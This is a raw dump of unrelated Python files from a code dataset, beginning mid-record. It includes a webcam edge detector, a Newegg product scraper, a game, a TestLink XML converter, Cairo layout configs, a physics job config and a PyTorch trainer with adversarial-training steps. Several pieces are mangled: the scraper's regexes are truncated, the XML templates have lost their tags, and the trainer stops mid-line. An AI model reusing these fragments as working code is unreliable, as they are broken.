% low_prop)\n\n\"\"\"\n# 2e\nHour 8 had the lowest proportion of successful pizza requests.\n\"\"\"","sub_path":"ds4ua-assignment-8-solns.py","file_name":"ds4ua-assignment-8-solns.py","file_ext":"py","file_size_in_byte":6642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"84734717","text":"# import the necessary packages\nfrom pyimagesearch.transform import four_point_transform\nfrom skimage.filters import threshold_local\nimport numpy as np\nimport argparse\nimport cv2\nimport imutils\n\n\ndef add_second_image(origin, sec_image):\n x_offset = origin.shape[1] - 20\n y_offset = origin.shape[0] - 20\n # x_offset = y_offset = 20\n # origin[y_offset:y_offset + sec_image.shape[0], x_offset:x_offset + sec_image.shape[1]] = sec_image\n origin[y_offset - sec_image.shape[0]:y_offset, x_offset - sec_image.shape[1]:x_offset] = sec_image\n\n\ndef put4ChannelImageOn4ChannelImage(back, fore, x, y):\n rows, cols, channels = fore.shape\n trans_indices = fore[..., 3] != 0 # Where not transparent\n overlay_copy = back[y:y + rows, x:x + cols]\n print(trans_indices.shape)\n overlay_copy[trans_indices] = fore[trans_indices]\n back[y:y + rows, x:x + cols] = overlay_copy\n\n\ndef overlay_image_alpha(img, img_overlay, pos, alpha_mask):\n \"\"\"Overlay img_overlay on top of img at the position specified by\n pos and blend using alpha_mask.\n\n Alpha mask must contain values within the range [0, 1] and be the\n same size as img_overlay.\n \"\"\"\n\n x, y = pos\n\n # Image ranges\n y1, y2 = max(0, y), min(img.shape[0], y + img_overlay.shape[0])\n x1, x2 = max(0, x), min(img.shape[1], x + img_overlay.shape[1])\n\n # Overlay ranges\n y1o, y2o = max(0, -y), min(img_overlay.shape[0], img.shape[0] - y)\n x1o, x2o = max(0, -x), min(img_overlay.shape[1], img.shape[1] - x)\n\n # Exit if nothing to do\n if y1 >= y2 or x1 >= x2 or y1o >= y2o or x1o >= x2o:\n return\n\n channels = img.shape[2]\n\n alpha = alpha_mask[y1o:y2o, x1o:x2o]\n alpha_inv = 1.0 - alpha\n\n for c in range(channels):\n img[y1:y2, x1:x2, c] = (alpha * img_overlay[y1o:y2o, x1o:x2o, c] +\n alpha_inv * img[y1:y2, x1:x2, c])\n\n\ndef contour_detect2(imgray):\n ret, thresh = cv2.threshold(imgray, 127, 255, 0)\n contours = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n return contours\n\n\ndef contour_detect(edge):\n # find the contours in the edged image, keeping only the\n # largest ones, and initialize the screen contour\n cnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5]\n screenCnt = None\n\n # loop over the contours\n for c in cnts:\n # approximate the contour\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n # if our approximated contour has four points, then we\n # can assume that we have found our screen\n if len(approx) == 4:\n screenCnt = approx\n break\n\n return screenCnt\n\n\ndef edge_detect(image):\n # ratio = image.shape[0] / 500.0\n # orig = image.copy()\n # image = imutils.resize(image, height=100)\n\n # convert the image to grayscale, blur it, and find edges\n # in the image\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(gray, 75, 200)\n\n return edged\n\n\n# # find the contours in the edged image, keeping only the\n# # largest ones, and initialize the screen contour\n# cnts = cv2.findContours(edged.copy(), cv2.RETR_LIST, 
cv2.CHAIN_APPROX_SIMPLE)\n# cnts = imutils.grab_contours(cnts)\n# cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:5]\n#\n# # loop over the contours\n# for c in cnts:\n# # approximate the contour\n# peri = cv2.arcLength(c, True)\n# approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n#\n# # if our approximated contour has four points, then we\n# # can assume that we have found our screen\n# if len(approx) == 4:\n# screenCnt = approx\n# break\n#\n# # show the contour (outline) of the piece of paper\n# print(\"STEP 2: Find contours of paper\")\n# cv2.drawContours(image, [screenCnt], -1, (0, 255, 0), 2)\n# cv2.imshow(\"Outline\", image)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n#\n# # apply the four point transform to obtain a top-down\n# # view of the original image\n# warped = four_point_transform(orig, screenCnt.reshape(4, 2) * ratio)\n#\n# # convert the warped image to grayscale, then threshold it\n# # to give it that 'black and white' paper effect\n# warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)\n# T = threshold_local(warped, 11, offset=10, method=\"gaussian\")\n# warped = (warped > T).astype(\"uint8\") * 255\n#\n# # show the original and scanned images\n# print(\"STEP 3: Apply perspective transform\")\n# cv2.imshow(\"Original\", imutils.resize(orig, height=650))\n# cv2.imshow(\"Scanned\", imutils.resize(warped, height=650))\n# cv2.waitKey(0)\n\n\ncap = cv2.VideoCapture(0)\n\nwhile (True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n frame = imutils.resize(frame, height=500)\n\n # Our operations on the frame come here\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # gray = cv2.bilateralFilter(gray, 11, 17, 17)\n\n edged = edge_detect(frame)\n\n # find contours\n screenCnt = contour_detect(edged)\n\n edged = cv2.cvtColor(edged, cv2.COLOR_GRAY2RGB)\n edged = imutils.resize(edged, height=250)\n\n if (screenCnt is not None):\n cv2.drawContours(frame, [screenCnt], -1, (0, 255, 0), 2)\n\n add_second_image(frame, edged)\n # put4ChannelImageOn4ChannelImage(frame, edged, 20, 20)\n # overlay_image_alpha(frame, edged, (10, 10), edged[:, :, 3] / 255.0)\n\n # Display the resulting frame\n cv2.imshow('origin', frame)\n # cv2.imshow('edged', edged)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"cam_to_credit/liveCamEdgeDetect.py","file_name":"liveCamEdgeDetect.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"129259812","text":"import codecs\nimport json\nfrom multiprocessing import Pool, Lock\nimport re\nfrom Tools import get_html,ALL_CONFIG\n\n#把list洗乱\ndef shuffle_list(list_name):\n\n from random import shuffle\n shuffle(list_name)\n # 返回随机排序后的序列\n return list_name\n\n#传入商品页面的html和商品的id\ndef get_info(html, itemsId):\n\n items_json = {'registered_land': '', 'isbn': '', 'description': '', 'weight': '0.0000', 'ean': '', 'mpn': '',\n 'key_name': ' ', 'price': '', 'height': '0.0000', 'currency': 'USD', 'brand': '',\n 'length_class': '', 'product_id': '', 'category': '', 'jan': '', 'seller_id': '', 'name': '',\n 'keyword': '', 'weight_class': 'kg', 'url': '', 'key_attribute': '', 'detail': {}, 'shipping': '',\n 'orders': 0, 'reviews': '0', 'width': '0.0000', 'length': '0.0000', 'location': '',\n 'attributes': [{'price': '', 'variation_id': '', 'dictory': 'Ships From',\n 'attributes': {'Ships From': ''}, 'image': [], 'quantity': 99}],\n 'category_id_path': '', 'category_id': 
'', 'upc': '', 'image': []}\n\n #读取价格字段存入\n # price = re.findall(\"(.*?)', html_price)\n if price:\n price = price[0]\n else:\n price = 'None'\n items_json['price'] = price\n\n # print '----------------url--------------'\n items_json['url'] = url\n\n # print '----------------shipping--------------'\n ship = '0'\n ship = re.search(r'product_default_shipping_cost:\\[(.*?)\\]', html)\n if ship:\n ship = ship.group(1).replace(\"'\", \"\")\n items_json['shipping'] = ship\n\n # print '----------------brand--------------'\n brand = ''\n brand = re.search(r'product_manufacture:\\[(.*?)\\]', html)\n if brand:\n brand = brand.group(1).replace(\"'\", \"\")\n items_json['brand'] = brand\n\n # print '----------------name--------------'\n name = ''\n name_info = re.search(r'product_title:\\[(.*?)\\]', html)\n if name_info:\n name = name_info.group(1).replace(\"'\", \"\").replace('&', '').replace(\"#34;\", \"''\").replace(\"#40;\",\n \"(\").replace(\n '#41;', ')').replace(\"#47;\", \"\\\\\")\n name = name.decode(\"ascii\").encode(\"utf-8\")\n items_json['name'] = name\n\n # print '----------------weight--------------'\n weight_number = 0.0000\n items_json['weight'] = weight_number\n\n # print '----------------weight_class--------------'\n weight_class = 'kg'\n items_json['weight_class'] = weight_class\n\n # print '----------------height--------------'\n height_number = 0.0000\n items_json['height'] = height_number\n\n # print '----------------width--------------'\n width = 0.0000\n items_json['width'] = width\n\n # print '----------------length_class--------------'\n length_class = 'cm'\n items_json['length_class'] = length_class\n\n # print '----------------product_id--------------'\n items_json['product_id'] = itemsId\n\n # print '----------------reviews--------------\n reviews = '0'\n items_json['reviews'] = reviews\n\n # print '----------------upc--------------'\n upc = ''\n items_json['upc'] = upc\n\n\n # print '----------------seller_id--------------'\n sellerId = ''\n items_json['seller_id'] = sellerId\n\n # print '----------------detail----------详描----'\n Specification = {}\n spct_info = re.search(r'
<table[^>]*>
    (.*?)
    </table>', html, re.S)\n    if spct_info is not None:\n        spct_info = spct_info.group(1)\n        spct_list = re.findall(r'<tr[^>]*>
    <th[^>]*>(.*?)</th>
    <td[^>]*>(.*?)</td>
    </tr>', spct_info, re.S)\n        if spct_list:\n            for spct in spct_list:\n                temp1 = re.sub(r'<[^>]+>', '', spct[0], re.S)\n                temp2 = re.sub(r'<[^>]+>', '', spct[1], re.S)\n                Specification[temp1] = temp2\n    items_json['detail'] = Specification\n\n    # Specification = str(Specification).replace('{', '').replace('}', '').replace(\"'\", '').replace(',','').replace('<br>','')\n    # if len(items_info['Specification']) >= 2000:\n    #     items_info['Specification'] = items_info['Specification'][0:1999]\n\n    image = []\n    image_info = re.search(r'\"imageSetImageList\":\"(.*?)\"', html, re.S)\n    image_list = ''\n    if image_info is not None:\n        image_list = image_info.group(1)\n        image_all = image_list.split(',')\n        for images in image_all:\n            images = 'http://images17.newegg.com/is/image/newegg/' + images\n            image.append(images)\n    if image_info is None:\n        image_info = re.search(r'\"imageNameList\":\"(.*?)\"\\}', html, re.S)\n        if image_info is not None:\n            image_list = image_info.group(1)\n            image_all = image_list.split(',')\n            for images in image_all:\n                if images != '\"dfis360ImgFlag\":\"':\n                    images = images.split('\"')[0]\n                    images = 'http://images10.newegg.com/ProductImage/' + images\n                    image.append(images)\n    items_json['image'] = image\n\n    category_dict = {'Computer Systems':'ID-CS-503','Components':'ID-C-504','Electronics':'ID-E-505','Gaming':'ID-G-506','Networking':'ID-N-507',\n                     'Office Solutions':'ID-OS-508','Software Services':'ID-SS-509','Automotive Industrial':'ID-AI-510','Home Tools':'ID-HT-511',\n                     'Health Sports':'ID-HS-512','Apparel Accessories':'ID-AA-513','Hobbies Toys':'ID-HT-514'}\n\n    # print '----------------category--------------'\n    category_string_html = re.findall(r'<div[^>]*>
    (.*?)
    </div>', html, re.S)\n    category_html_list = re.findall(r'title=\"(.*?)\"', str(category_string_html), re.S)\n    print (category_html_list)\n    category_string = ''\n    for category_s in category_html_list[2:]:\n        category_string = category_string + category_s + '>'\n    items_json['category'] = category_string[:-1]\n\n    # print '----------------category_id_path--------------'\n    category_url_list = re.findall(r'href=\"(.*?)\"',str(category_string_html),re.S)\n    category_id_path = ''\n    for url_path in category_url_list:\n        url_path = url_path.split('?')[0]\n        category_id_path = category_id_path + url_path.split('/')[-1] + '>'\n    items_json['category_id_path'] = str(category_dict[category_html_list[2]])+category_id_path[5:-1]\n\n    # print '----------------category_id----------------'\n    items_json['category_id'] = category_id_path.split('>')[-2]\n\n    # print '----------------attributes----------------'\n    items_json['attributes'][0]['price'] = str(price)\n    items_json['attributes'][0]['variation_id'] = itemsId + '_' + itemsId\n    items_json['attributes'][0]['image'] = image[0]\n\n    # print '----------------description-------short desc-------'\n    details = []\n    description_str = ''\n    detail_info = re.search(r'<ul[^>]*>
      (.*?)
    ', html, re.S)\n if detail_info is not None:\n detail_info = detail_info.group(1)\n detail_info = detail_info.replace('\\r\\n', '').replace('\\t', '')\n detail = re.findall(r'(.*?)', detail_info, re.S)\n for i in detail:\n i = i.strip()\n i = i.decode(\"ascii\").encode(\"utf-8\")\n details.append(i)\n #函数get_feature_dict\n for description in details:\n description_str = description_str + description + ';'\n items_json['description'] = description_str\n\n # print '----------------写入文件----------------'\n json_file = json.dumps(items_json)\n result_file.write(json_file + '\\n')\n print ('=============')\n print (items_json)\n result_file.flush()\n\n # for k in titles:\n # if items_dict.has_key(k):\n # value = items_dict.get(k)\n # else:\n # value = 'None'\n # lock.acquire()\n # result_file.write(str(value) + \"\\t\")\n # result_file.flush()\n # lock.release()\n #\n # lock.acquire()\n # result_file.write('\\n')\n # result_file.flush()\n # lock.release()\n\n#把itemsId页面的html传入get_info函数中,把失败的id重新存一个文件\ndef handle(itemsId):\n try:\n #删除itemsId开头结尾处的空格\n itemsId = itemsId.strip()\n #商品详情页\n url = 'http://www.newegg.com/Product/Product.aspx?Item=' + itemsId\n #获取每一个商品页面的html\n html = get_html.get_html(url)\n\n if html:\n #调用get_info函数,传入html和每个商品的id\n get_info(html, itemsId)\n else:\n with open('./get_html_fail.txt', 'aw') as h:\n h.write(itemsId + '\\n')\n\n except Exception as e:\n print (itemsId, \":\", e)\n with open('./except.txt', 'aw') as f:\n f.write(itemsId + '\\n')\n\n\n#去重后的items的id文件\ndef start(items_file):\n\n global result_file, lock, titles\n\n item_file = open(items_file, 'r')\n\n result_file = open('./items_db.csv', 'w')\n items_list = item_file.readlines()\n lock = Lock()\n pool = Pool(10)\n #调用函数把items_list的内容依次传入handle函数中\n pool.map(handle, items_list)\n pool.close()\n pool.join()\n\n item_file.close()\n result_file.close()\n\n\nif __name__ == \"__main__\":\n start('./items_db_last.txt')\n","sub_path":"购物类/Newegg/get_newegg_db.py","file_name":"get_newegg_db.py","file_ext":"py","file_size_in_byte":9745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421799582","text":"'''\n Assignment Day-5\n Rock, paper, scissors\n'''\nfrom random import choice\n\ndef comp_pick():\n pick = choice([\"rock\", \"paper\", \"scissors\"])\n print(\"Computer picked \" + pick)\n return pick\n\ndef compare_picks(user_in, comp_in):\n if user_in == comp_in:\n return \"Tie!\"\n elif user_in == \"rock\" and comp_in == \"paper\":\n return \"Computer wins!\"\n elif user_in == \"paper\" and comp_in == \"scissors\":\n return \"Computer wins!\"\n elif user_in == \"scissors\" and comp_in == \"rock\":\n return \"Computer wins!\"\n else:\n return \"You wins!\"\n\n\nif __name__ == '__main__':\n print(\"Rock, Paper, Scissors...\")\n \n while True:\n user = input(\"What's your pick? 
\\n\").lower()\n        if user == 'exit':\n            break\n        elif user not in ['rock', 'paper', 'scissors']:\n            print(user + \" is not one of the choices\\n\")\n        else:\n            print(compare_picks(user, comp_pick()))","sub_path":"Day5/Day5_assignment.py","file_name":"Day5_assignment.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"598533033","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nConverts test cases from a custom text format into TestLink's native XML\n\"\"\"\n\n\nimport argparse\nimport logging\nimport logging.config\n\n\ndef init_logger():\n    \"\"\"\n    Initialize logger\n    \"\"\"\n\n    logging_config = {\n        'version': 1,\n        'formatters': {\n            'default': {\n                'format': '[%(asctime)s][%(levelname)9s]: %(message)s'\n            },\n        },\n        'handlers': {\n            'console': {\n                'level': 'DEBUG',\n                'class': 'logging.StreamHandler',\n                'formatter': 'default',\n            },\n            # 'file': {\n            #     'level': 'DEBUG',\n            #     'class': 'logging.FileHandler',\n            #     'formatter': 'default',\n            #     'filename': 'out1.log',\n            #     # 'mode': 'w',\n            #     # 'encoding': 'utf-8',\n            # },\n        },\n        'root': {\n            'level': 'DEBUG',\n            # 'handlers': ['console', 'file']\n            'handlers': ['console']\n        },\n    }\n\n    logging.config.dictConfig(logging_config)\n\n\ndef test():\n    \"\"\"\n    Simple docstring test\n    \"\"\"\n    import doctest\n    doctest.testmod()\n\n\ndef insert_suite_header(name, fout):\n    data=\"\"\"\n    <testsuite name=\"{}\">\n    <node_order></node_order>\n
    <details></details>\n\n    \"\"\".format(name)\n\n    fout.write(data)\n\n\ndef insert_suite_footer(fout):\n    data=\"\"\"\n    </testsuite>
    \n \"\"\"\n fout.write(data)\n\n\ndef insert_case_header(name, summary, precond, fout):\n data=\"\"\"\n \n \n \n\n \n\n \n\n \n \n \n 1\n 1\n 1\n\n \n \"\"\".format(name, summary, precond)\n\n fout.write(data)\n\n\ndef insert_case_footer(fout):\n data=\"\"\"\n \n \n \"\"\"\n\n fout.write(data)\n\n\ndef insert_case_step(step_num, actions, expected_results, fout):\n data=\"\"\"\n \n \n\n \n\n \n\n \n \n \"\"\".format()\n\n fout.write(data)\n\n\n\ndef main():\n \"\"\"\n Start point\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--input\", dest=\"input_file\", default=\"\",\n help=\"Input file\")\n parser.add_argument(\"-o\", \"--output\", dest=\"output_file\", default=\"\",\n help=\"Output file\")\n args = parser.parse_args()\n\n with open(args.input_file) as fin:\n with open(args.output_file, 'w') as fout:\n fout.write('')\n\n insert_suite_header('Требования Росгвардии', fout)\n # for line in reversed(list(fin)):\n in_suite_l1 = False\n in_suite_l2 = False\n for line in list(fin):\n line = line.rstrip()\n\n if line.startswith(',,'):\n line = line[2:] # remove first ',,'\n insert_case_header(line, '', '', fout)\n insert_case_footer(fout)\n\n elif line.startswith(','):\n if in_suite_l2:\n insert_suite_footer(fout)\n line = line[1:] # remove first ','\n insert_suite_header(line, fout)\n in_suite_l2 = True\n\n else:\n if in_suite_l2:\n insert_suite_footer(fout)\n in_suite_l2 = False\n\n if in_suite_l1:\n insert_suite_footer(fout)\n\n insert_suite_header(line, fout)\n in_suite_l1 = True\n\n if in_suite_l2:\n insert_suite_footer(fout)\n if in_suite_l1:\n insert_suite_footer(fout)\n\n insert_suite_footer(fout)\n\n\nif __name__ == \"__main__\":\n # test()\n init_logger()\n logging.info('Started')\n main()\n logging.info('Finished')\n","sub_path":"program/tl-create-cases-from-txt-1.py","file_name":"tl-create-cases-from-txt-1.py","file_ext":"py","file_size_in_byte":4473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"602077167","text":"import dataclasses\nfrom dataclasses import field\nfrom typing import Any, Dict, Optional\n\nfrom starkware.cairo.lang.builtins.bitwise.instance_def import CELLS_PER_BITWISE, BitwiseInstanceDef\nfrom starkware.cairo.lang.builtins.hash.instance_def import CELLS_PER_HASH, PedersenInstanceDef\nfrom starkware.cairo.lang.builtins.range_check.instance_def import (\n CELLS_PER_RANGE_CHECK, RangeCheckInstanceDef)\nfrom starkware.cairo.lang.builtins.signature.instance_def import (\n CELLS_PER_SIGNATURE, EcdsaInstanceDef)\n\n\n@dataclasses.dataclass\nclass CpuInstanceDef:\n # Verifies that each 'call' instruction returns, even if the called function is malicious.\n safe_call: bool = True\n\n\n@dataclasses.dataclass\nclass CairoLayout:\n layout_name: str = ''\n cpu_component_step: int = 1\n # Range check units.\n rc_units: int = 16\n builtins: Dict[str, Any] = field(default_factory=lambda: {})\n # The ratio between the number of public memory cells and the total number of memory cells.\n public_memory_fraction: int = 4\n memory_units_per_step: int = 8\n diluted_units_per_step: Optional[int] = None\n cpu_instance_def: CpuInstanceDef = field(default=CpuInstanceDef())\n\n\nCELLS_PER_BUILTIN = dict(\n pedersen=CELLS_PER_HASH,\n range_check=CELLS_PER_RANGE_CHECK,\n ecdsa=CELLS_PER_SIGNATURE,\n bitwise=CELLS_PER_BITWISE,\n)\n\nplain_instance = CairoLayout(\n layout_name='plain',\n)\n\nsmall_instance = CairoLayout(\n layout_name='small',\n rc_units=16,\n builtins=dict(\n output=True,\n 
pedersen=PedersenInstanceDef(\n ratio=8,\n repetitions=4,\n element_height=256,\n element_bits=252,\n n_inputs=2,\n hash_limit=2**251 + 17 * 2**192 + 1,\n ),\n range_check=RangeCheckInstanceDef(\n ratio=8,\n n_parts=8,\n ),\n ecdsa=EcdsaInstanceDef(\n ratio=512,\n repetitions=1,\n height=256,\n n_hash_bits=251,\n ),\n )\n)\n\ndex_instance = CairoLayout(\n layout_name='dex',\n rc_units=4,\n builtins=dict(\n output=True,\n pedersen=PedersenInstanceDef(\n ratio=8,\n repetitions=4,\n element_height=256,\n element_bits=252,\n n_inputs=2,\n hash_limit=2**251 + 17 * 2**192 + 1,\n ),\n range_check=RangeCheckInstanceDef(\n ratio=8,\n n_parts=8,\n ),\n ecdsa=EcdsaInstanceDef(\n ratio=512,\n repetitions=1,\n height=256,\n n_hash_bits=251,\n ),\n )\n)\n\nall_instance = CairoLayout(\n layout_name='all',\n rc_units=8,\n public_memory_fraction=8,\n diluted_units_per_step=16,\n builtins=dict(\n output=True,\n pedersen=PedersenInstanceDef(\n ratio=8,\n repetitions=4,\n element_height=256,\n element_bits=252,\n n_inputs=2,\n hash_limit=2**251 + 17 * 2**192 + 1,\n ),\n range_check=RangeCheckInstanceDef(\n ratio=8,\n n_parts=8,\n ),\n ecdsa=EcdsaInstanceDef(\n ratio=512,\n repetitions=1,\n height=256,\n n_hash_bits=251,\n ),\n bitwise=BitwiseInstanceDef(\n ratio=256,\n diluted_spacing=4,\n diluted_n_bits=16,\n total_n_bits=251,\n ),\n )\n)\n\nLAYOUTS: Dict[str, CairoLayout] = {\n 'plain': plain_instance,\n 'small': small_instance,\n 'dex': dex_instance,\n 'all': all_instance,\n}\n","sub_path":"vendor/cairo-lang/src/starkware/cairo/lang/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"653597633","text":"import os, logging, sys, getpass\n\nfrom tthAnalysis.HiggsToTauTau.tthAnalyzeSamples_3l_1tau_2015 import samples_2015\nfrom tthAnalysis.HiggsToTauTau.tthAnalyzeSamples_3l_1tau_2016 import samples_2016\nfrom tthAnalysis.HiggsToTauTau.prodNtupleConfig_3l_1tau import prodNtupleConfig_3l_1tau\nfrom tthAnalysis.HiggsToTauTau.jobTools import query_yes_no\n\n#ERA = \"2015\"\nERA = \"2016\"\n\nsamples = None\nLUMI = None\nif ERA == \"2015\":\n samples = samples_2015\n LUMI = 2.3e+3 # 1/pb\nelif ERA == \"2016\":\n samples = samples_2016\n LUMI = 12.9e+3 # 1/pb\nelse:\n raise ValueError(\"Invalid Configuration parameter 'ERA' = %s !!\" % ERA)\n\nversion = \"2017Jan12_forBDTtraining\" # must be the same version as in test/tthAnalyzeRun_3l_1tau.py !\n\n#-------------------------------------------------------------------------------- \n# CV: run Ntuple production jobs also for high statistics background samples\n# not used in the analysis, but used for BDT training by Arun\nfor sample_name, sample_info in samples_2016.items():\n if sample_name in [\n \"/TT_TuneCUETP8M1_13TeV-powheg-pythia8/RunIISpring16MiniAODv1-PUSpring16_80X_mcRun2_asymptotic_2016_v3_ext3-v1/MINIAODSIM\",\n \"/TT_TuneCUETP8M1_13TeV-powheg-pythia8/RunIISpring16MiniAODv1-PUSpring16_80X_mcRun2_asymptotic_2016_v3_ext4-v1/MINIAODSIM\",\n \"/TTW/spring16DR80v6aMiniAODv1/FASTSIM\",\n \"/TTZToLLNuNu_M-10_TuneCUETP8M1_13TeV-amcatnlo-pythia8/RunIISpring16MiniAODv2-premix_withHLT_80X_mcRun2_asymptotic_v14_ext1-v1/MINIAODSIM\",\n \"/WZTo3LNu_TuneCUETP8M1_13TeV-powheg-pythia8/RunIISpring16MiniAODv2-PUSpring16_80X_mcRun2_asymptotic_2016_miniAODv2_v0-v1/MINIAODSIM\",\n \"/ttHToNonbb_M125_13TeV_powheg_pythia8/RunIISpring16MiniAODv2-PUSpring16RAWAODSIM_reHLT_80X_mcRun2_asymptotic_v14-v1/MINIAODSIM\" ]:\n sample_info[\"use_it\"] = True\n 
else:\n sample_info[\"use_it\"] = False\n#-------------------------------------------------------------------------------- \n\nif __name__ == '__main__':\n logging.basicConfig(\n stream = sys.stdout,\n level = logging.INFO,\n format = '%(asctime)s - %(levelname)s: %(message)s')\n\n ntupleProduction = prodNtupleConfig_3l_1tau(\n outputDir = os.path.join(\"/home\", getpass.getuser(), \"ttHNtupleProduction\", ERA, version),\n executable_prodNtuple = \"produceNtuple_3l_1tau\",\n cfgFile_prodNtuple = \"produceNtuple_3l_1tau_forBDTtraining_cfg.py\",\n samples = samples,\n era = ERA,\n debug = False,\n running_method = \"sbatch\",\n rle_directory = 'default', # [*]\n version = version,\n num_parallel_jobs = 4)\n # [*] if rle_directory is set to 'default', then it looks files in /home/$USER/ttHAnalysis/era/version/rles/channel\n # set it to '', if no RLE selection is needed\n \n ntupleProduction.create()\n\n run_ntupleProduction = query_yes_no(\"Start jobs ?\")\n if run_ntupleProduction:\n ntupleProduction.run()\n else:\n sys.exit(0)\n\n","sub_path":"test/tthPreselNtuple_3l_1tau_forBDTtraining.py","file_name":"tthPreselNtuple_3l_1tau_forBDTtraining.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"71895962","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/1/21 8:29 下午\n# @Author : jeffery\n# @FileName: trainer_sigmoid.py\n# @website : http://www.jeffery.ink/\n# @github : https://github.com/jeffery0628\n# @Description:\n\n\nfrom utils import inf_loop, MetricTracker\nfrom base import BaseTrainer\nimport torch\nimport numpy as np\nimport model.adversarial as module_adversarial\nimport model.metric as module_mertric\nimport json\n\nclass Trainer(BaseTrainer):\n \"\"\"\n Trainer class\n \"\"\"\n\n def __init__(self, model, criterion, metric_ftns, optimizer, config,i_fold, data_loader,\n valid_data_loader=None, test_data_loader=None, lr_scheduler=None, len_epoch=None):\n super().__init__(model, criterion, metric_ftns, optimizer, config)\n self.config = config\n self.i_fold = i_fold\n self.data_loader = data_loader\n if len_epoch is None:\n # epoch-based training\n self.len_epoch = len(self.data_loader)\n else:\n # iteration-based training\n self.data_loader = inf_loop(data_loader)\n self.len_epoch = len_epoch\n self.valid_data_loader = valid_data_loader\n self.test_data_loader = test_data_loader\n\n self.lr_scheduler = lr_scheduler\n self.log_step = int(np.sqrt(data_loader.batch_size))\n\n self.train_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)\n self.valid_metrics = MetricTracker('loss', *[m.__name__ for m in self.metric_ftns], writer=self.writer)\n\n def _train_epoch(self, epoch):\n \"\"\"\n Training logic for an epoch\n\n :param epoch: Integer, current training epoch.\n :return: A log that contains average loss and metric in this epoch.\n \"\"\"\n self.model.zero_grad()\n self.train_metrics.reset()\n adv_train = self.config.init_obj('adversarial_training',module_adversarial,model=self.model)\n K = 3\n for batch_idx, data in enumerate(self.data_loader):\n self.model.train()\n ids,texts, input_ids, attention_masks, text_lengths, labels = data\n\n if 'cuda' == self.device.type:\n input_ids = input_ids.cuda(self.device)\n attention_masks = attention_masks.cuda(self.device)\n labels = labels.cuda(self.device)\n\n preds, cls_embedding = self.model(input_ids, attention_masks,text_lengths)\n loss = self.criterion[0](preds, labels)\n # 损失截断\n loss_zeros = 
torch.zeros_like(loss)\n            loss = torch.where(loss > float(self.config.config['loss']['loss_cut']), loss, loss_zeros)\n            loss.backward()\n            if self.config.config['trainer']['is_adversarial_training'] and self.config.config['adversarial_training']['type']=='FGM': # adversarial training\n                adv_train.attack()\n                adv_preds,adv_cls_embedding = self.model(input_ids,attention_masks,text_lengths)\n                adv_loss = self.criterion[0](adv_preds, labels)\n                adv_loss.backward()\n                adv_train.restore()\n            elif self.config.config['trainer']['is_adversarial_training'] and self.config.config['adversarial_training']['type']=='PGD':\n                adv_train.backup_grad()\n                # adversarial training\n                for t in range(K):\n                    adv_train.attack(is_first_attack=(t == 0)) # add an adversarial perturbation on the embedding; back up param.data on the first attack\n                    if t != K - 1:\n                        self.model.zero_grad()\n                    else:\n                        adv_train.restore_grad()\n                    adv_preds, adv_cls_embedding= self.model(input_ids,attention_masks,text_lengths)\n                    adv_loss = self.criterion[0](adv_preds, labels)\n                    adv_loss.backward() # backpropagate, accumulating the adversarial gradients on top of the normal grad\n                adv_train.restore() # restore the embedding parameters\n\n            if self.config.config['trainer']['clip_grad']: # gradient clipping\n                torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.config.config['trainer']['max_grad_norm'])\n            self.optimizer.step()\n            if self.lr_scheduler is not None:\n                self.lr_scheduler.step()\n            self.model.zero_grad()\n            self.writer.set_step((epoch - 1) * self.len_epoch + batch_idx)\n            self.train_metrics.update('loss', loss.item())\n\n            for met in self.metric_ftns:\n                self.train_metrics.update(met.__name__, met(preds, labels))\n\n            if batch_idx % self.log_step == 0:\n                self.logger.debug('Train Epoch: {} {} Loss: {:.3f} lr: {}'.format(epoch, self._progress(batch_idx),\n                                                                                  loss.item(),self.optimizer.param_groups[0]['lr']))\n            if batch_idx == self.len_epoch:\n                break\n\n        log = self.train_metrics.result()\n        if self.valid_data_loader:\n            val_log = self._valid_epoch(epoch)\n            log.update(**{'val_' + k: v for k, v in val_log.items()})\n        return log\n\n    def _valid_epoch(self, epoch):\n        \"\"\"\n        Validate after training an epoch\n\n        :param epoch: Integer, current training epoch.\n        :return: A log that contains information about validation\n        \"\"\"\n        self.model.eval()\n        self.valid_metrics.reset()\n\n        with torch.no_grad():\n            for batch_idx, data in enumerate(self.valid_data_loader):\n                ids,texts, input_ids, attention_masks, text_lengths, labels = data\n                if 'cuda' == self.device.type:\n                    input_ids = input_ids.cuda(self.device)\n                    attention_masks = attention_masks.cuda(self.device)\n                    labels = 